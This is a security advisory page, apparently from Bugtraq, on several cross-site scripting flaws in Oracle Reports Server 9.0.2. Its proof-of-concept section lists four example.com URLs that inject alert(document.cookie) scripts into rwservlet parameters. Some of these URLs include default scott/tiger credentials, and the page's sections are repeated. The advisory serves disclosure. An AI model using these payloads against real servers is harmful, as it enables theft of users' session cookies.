Oracle Reports Server Multiple Cross-Site Scripting Vulnerabilities
BID:14313
Info
Oracle Reports Server Multiple Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 14313 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 19 2005 12:00AM |
| Updated: | Jul 19 2005 12:00AM |
| Credit: | Discovery is credited to Alexander Kornbrust. |
| Vulnerable: |
Oracle Oracle Reports 10g 9.0.2 |
| Not Vulnerable: | |
Discussion
Oracle Reports Server Multiple Cross-Site Scripting Vulnerabilities
Multiple remote cross-site scripting vulnerabilities affect Oracle Reports Server.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Oracle Reports Server 9.0.2 with patchset 2 is reported to be vulnerable. Other versions may be affected as well.
Multiple remote cross-site scripting vulnerabilities affect Oracle Reports Server.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Oracle Reports Server 9.0.2 with patchset 2 is reported to be vulnerable. Other versions may be affected as well.
Exploit / POC
Oracle Reports Server Multiple Cross-Site Scripting Vulnerabilities
No exploit is required to leverage these issues. The following proof of concept examples are available:
http://www.example.com:7778/reports/rwservlet/showenv?server=reptest&debug=<script>aler
t(document.cookie);</script>
http://www.example.com:7778/reports/rwservlet/parsequery?server=myserver&test=<script>a
lert(document.cookie);</script>
http://www.example.com:7778/reports/rwservlet?server=myserver+report=test.rdf+userid=sc
ott/tiger@iasdb+destype=localFile+desformat=delimited+desname=FILE:+CELLWRAPPER=
*+delimiter=<script>alert(document.cookie);</script>
http://www.example.com:7778/reports/rwservlet?server=myserver+report=test.rdf+userid=sc
ott/tiger@iasdb+destype=localFile+desformat=delimited+desname=FILE:+CELLWRAPPER=
<script>alert(document.cookie);</script>
No exploit is required to leverage these issues. The following proof of concept examples are available:
http://www.example.com:7778/reports/rwservlet/showenv?server=reptest&debug=<script>aler
t(document.cookie);</script>
http://www.example.com:7778/reports/rwservlet/parsequery?server=myserver&test=<script>a
lert(document.cookie);</script>
http://www.example.com:7778/reports/rwservlet?server=myserver+report=test.rdf+userid=sc
ott/tiger@iasdb+destype=localFile+desformat=delimited+desname=FILE:+CELLWRAPPER=
*+delimiter=<script>alert(document.cookie);</script>
http://www.example.com:7778/reports/rwservlet?server=myserver+report=test.rdf+userid=sc
ott/tiger@iasdb+destype=localFile+desformat=delimited+desname=FILE:+CELLWRAPPER=
<script>alert(document.cookie);</script>
Solution / Fix
Oracle Reports Server Multiple Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Oracle Reports Server Multiple Cross-Site Scripting Vulnerabilities
References:
References: